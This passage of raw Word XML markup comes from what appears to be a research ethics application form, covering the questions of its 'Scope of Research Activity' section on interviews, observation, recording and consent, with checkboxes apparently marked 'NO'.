          <w:p w14:paraId="048A2F7C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1420137672"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="444C51B5"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3AA4842C" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="218"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E4C2768" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7371" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5A90AAA7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AEFBBC1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A02DB50" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="1644230281"/>
                <w14:checkbox>
                  <w14:checked w14:val="0"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="73BF525C" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="546F6C57" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="519C3612" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>If Yes, please provide details here of how you will gain access to specific documentation that is not in the public domain and that this is in accordance with prevailing data protection law of the country in question and England and Wales.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D34307" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E98FF5C" w14:textId="77777777" w:rsidR="00CA0B92" w:rsidRDefault="00CA0B92" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A71CA27" w14:textId="1541F677" w:rsidR="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>SECTION F: Scope of Research Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2E208" w14:textId="77777777" w:rsidR="00CA0B92" w:rsidRPr="00E42F41" w:rsidRDefault="00CA0B92" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid1"/>
        <w:tblW w:w="10451" w:type="dxa"/>
        <w:tblInd w:w="-289" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="8227"/>
        <w:gridCol w:w="846"/>
        <w:gridCol w:w="816"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="597BB55D" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3A65010D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4FE6231E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will the research activity include:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4ADE161B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4502EC57" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1C3199FA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35ECD387" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="6A4AF426" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="79E98A06" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F60EED6" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Use of a questionnaire or similar research instrument?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1843739070"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="14B73587"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-474143939"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="538D2ED8"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6396FAD8" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="58855448" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DFF3F60" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Use of interviews?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-800765487"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="142F0AF6"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="749926786"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6BC444F9"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7F2124B7" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="32220A02" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EE6CAE3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Use of diaries?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="319468663"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="57025056"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="900483589"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="0ED0E656"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19AAB3C2" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="358A7884" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C3E397F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Participant observation with their knowledge?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="282394886"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="1A3072F0"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1338917432"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4FB624B2"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7D0FCDE6" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="44BECCF4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66C97E4F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Participant observation without their knowledge?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1942599491"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="5AFF9C73"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="626286741"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="1B21DC5E"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690DE84B" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="625AE2E5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53BF4C39" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Use of video or audio recording?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-387187341"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6CDC0929"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1580675213"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="50585DA8"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5E985DF4" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="55958586" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64303E51" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Access to personal or confidential information without the participants’ specific consent?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1397120567"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="29D3A50F"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="587048268"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="376FFF0D"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506C7240" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="16593761" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77AE40A1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Administration of any questions, test stimuli, presentation that may be experienced as physically, mentally or emotionally harmful / offensive?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-723911514"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="72F249C2"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="655270249"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="54049F9F"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3E2D758F" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6B67D2C5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="090DC163" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Performance of any acts which may cause embarrassment or affect self-esteem?</w:t>
            </w:r>
